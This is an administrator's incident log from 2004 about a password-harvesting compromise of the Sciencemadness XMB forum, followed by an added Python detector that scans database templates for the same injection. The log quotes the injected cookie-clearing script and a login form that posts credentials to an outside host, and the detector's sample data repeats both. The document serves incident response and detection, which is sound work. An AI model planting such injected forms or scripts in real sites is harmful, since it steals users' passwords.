Today, 4/7/2004, I discovered what appeared to be some sort of password-sniffing attack directed against the Sciencemadness discussion board. Here are the two messages of interest that were posted before I disabled the board:

Polverone (Super Administrator), posted on 7-4-2004 at 16:25
Subject: something weird

Today I went to log in to sciencemadness and I had to give my username/password (normally I stay logged in almost all the time). The login briefly redirected me to http://www.evelin29.com/images/boardscimad.php, which quickly brought me here. Now why would a maker of tea, located in Bulgaria with administrative contacts in Hong Kong, be involved with the login process for Sciencemadness?

I get the feeling that SM may have been the victim of some sort of hack. Passwords may have been compromised. I will let you know more as soon as I learn more.


Quantum (Hazard to Self), posted on 7-4-2004 at 16:30
The same thing happened to me at 12:28PM eastern time! Could be that all passwords are being sniffed through that server!

God damn hackers ruining it for everyone

Edit: I tried to go to the /images root but nothing happened. No server messages or anything. Then I tried /images/index.php and the only thing it said was Blah ))) http://www.evelin29.com/images/index.php
It makes me suspect that someone rooted evelin and then used it to stage a password sniffing attack on us.

[Edited on 7-4-2004 by Quantum]

In order to prevent further compromise of passwords, I have disabled the board until I can investigate the problem in more detail. If you have any helpful hints, try to contact me using frank @ bcis.pacificu.edu, or via AIM username uberspork (I won't be on AIM until 8:00 PM, Pacific Standard time). --Polverone

Update: There are many vulnerabilities in XMB 1.8 SP2. I *thought* that I had installed the security updates of SP3 at the same time that I added the edit-timelimit code. However, having downloaded a fresh copy of XMB 1.8 SP3 and manually comparing with what the board was running, it's clear that there were many unpatched pieces of code running on the Sciencemadness server. I have manually patched all the php files by hand, but this doesn't seem to have fixed anything. So, either the exploit is one that wasn't fixed in SP3, or I have again failed to properly patch our copy of XMB (I don't think this is the case), or it's a matter of "once the attacker has exploited the hole, merely closing the hole doesn't fix the problem."

Before I took the board offline, I changed my password. It seems that if you login using the little login box on the front page, rather than the full-page login form, there is no malicious redirection to evelin29.com (which I would guess has been compromised itself and is not a willing part of the exploit). However, I felt that if I didn't take the board offline, dozens of people would have already given away their passwords by the time they learned the "safe" way to login. The username/password combo used to administrate the board is completely different from that used to administrate the sciencemadness web hosting account, so I believe that an attacker would (at most) be able to screw with the board. But the board is the best part of sciencemadness, so I didn't want to risk Bad Things happening to it, if it stayed online.

Another update:
Tacho wrote to me:
"Today I put my name and password in the little login box in the front page and the main login page showed up. I had to repeat my name and password. So, the little login box in the front page was not safe either.

Hope this helps."

I was able to use the little front page login box without any redirection, but I don't know why my experience was different. Oh, and it turns out that if you go to http://www.evelin29.com/images/[anything].php, you get the little Blah :)))) (the only exception is boardscimad.php).

The source of the trouble? I have found the following, possibly suspicious code in the PHP-generated pages of Sciencemadness:
< script > (I changed this line so the tag wouldn't execute; I am not very HTML-savvy)
usr=''
if (usr!="")
{
    if (document.cookie.indexOf('parta')<1) {
        document.cookie='xmbuser=deleted; expires=Mon, 07-Apr-03 12:51:11 GMT; path=/talk/; domain=.sciencemadness.org'
        document.cookie='xmbpw=deleted; expires=Mon, 07-Apr-03 12:51:11 GMT; path=/talk/; domain=.sciencemadness.org'
        document.cookie='forum=parta; expires=Thu, 06-May-05 12:54:04 GMT; path=/talk/; domain=.sciencemadness.org'
        document.location='http://www.sciencemadness.org/talk/misc.php?action=login'
    }
}
< /script > (changed again so the tag isn't interpreted)

I don't know exactly what this code is doing (someone care to enlighten me?) but I don't see any code similar to it when examining other XMB boards' HTML.

Even more strangeness: I tried using an entirely fresh XMB 1.8 SP3 installation, just using the old config.php (which I examined for anything funny). The problem persists. Now I am really perplexed, and am starting to wonder if the server itself has been compromised.

The central culprit: The following line appears in the HTML generated by misc.php?action=login:
< form method="post" action="http://www.evelin29.com/images/boardscimad.php" >
(the usual code for the username/password submission fields follows). I really cannot tell how this (or the suspicious script stuff above) is getting sent to the end user. The PHP files aren't the problem. It looks like the first part, the script code that shows up on every page, is there to force cookie password expiration. Then the second part (on the login page) is there to get usernames and passwords in full. The boardscimad.php script on evelin29.com generates the following (no doubt after saving the user/pw): < script >document.location='http://www.sciencemadness.org/talk/misc.php?action=login&username=&password=&loginsubmit=1'< /script >

Hope on the horizon! I downloaded a backup of the XMB database, uncompressed it, and searched for evelin. What do I find? I found that the xmb_templates had been modified to insert the code that I couldn't find in any of the PHP files. Is this what's referred to as a SQL injection attack? Having found this, I believe that the board will work again when I've fixed the database (since I just upgraded to XMB 1.8 SP3, and I'm pretty sure it was an XMB 1.8 SP2 bug that was exploited). I have a 5 day old backup of the database. I wonder if it would be simpler (safer?) to restore the backup, instead of trying to make sure I manually remove everything that the attacker added to the database.
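An added detection example, not code from this post or from XMB: it scans template rows (such as the xmb_templates table pulled from a database dump like the one just described) for the two signs identified above, a login form whose action posts off-site and script that overwrites the xmbuser/xmbpw cookies. The list of the board's own hosts and the sample rows are assumptions constructed for the example.

```python
import re
from urllib.parse import urlparse

# Hosts the board legitimately posts to (assumed here from the URLs in the post).
OWN_HOSTS = {"www.sciencemadness.org", "sciencemadness.org"}
# XMB session cookie names, as seen in the injected script.
SESSION_COOKIES = ("xmbuser", "xmbpw")

FORM_ACTION_RE = re.compile(r'<form\b[^>]*?\baction\s*=\s*["\']?([^"\'\s>]+)', re.I)
COOKIE_DELETE_RE = re.compile(r"document\.cookie\s*=\s*['\"]([A-Za-z_]+)=deleted", re.I)

def foreign_form_actions(html, own_hosts=OWN_HOSTS):
    """Return form action URLs that submit to a host outside own_hosts.
    Relative actions (no host) stay on the board and are not reported."""
    found = []
    for action in FORM_ACTION_RE.findall(html):
        host = urlparse(action).hostname
        if host and host.lower() not in own_hosts:
            found.append(action)
    return found

def cleared_session_cookies(html, names=SESSION_COOKIES):
    """Return session cookie names that page script overwrites with 'deleted'."""
    return [n for n in COOKIE_DELETE_RE.findall(html) if n.lower() in names]

def scan_templates(rows, own_hosts=OWN_HOSTS):
    """rows: iterable of (template_name, template_body) pairs, e.g. the
    xmb_templates table from a dump. Returns (name, finding, detail) tuples."""
    findings = []
    for name, body in rows:
        for url in foreign_form_actions(body, own_hosts):
            findings.append((name, "form posts off-site", url))
        for cookie in cleared_session_cookies(body):
            findings.append((name, "session cookie cleared", cookie))
    return findings

# Constructed sample rows modelled on the fragments quoted above (not a real dump).
SAMPLE_ROWS = [
    ("header", "<script>usr='';if (usr!=\"\"){if (document.cookie.indexOf('parta')<1) {"
               "document.cookie='xmbuser=deleted; expires=Mon, 07-Apr-03 12:51:11 GMT; path=/talk/';"
               "document.cookie='xmbpw=deleted; expires=Mon, 07-Apr-03 12:51:11 GMT; path=/talk/';"
               "document.location='http://www.sciencemadness.org/talk/misc.php?action=login'}}</script>"),
    ("login", "<form method=\"post\" action=\"http://www.evelin29.com/images/boardscimad.php\">"),
    ("footer", "<form method=\"post\" action=\"misc.php?action=login\">"),  # clean row
]

if __name__ == "__main__":
    for finding in scan_templates(SAMPLE_ROWS):
        print(finding)
```

Running it against a real dump means feeding each template row's body in as a (name, body) pair; a clean board should produce no findings at all.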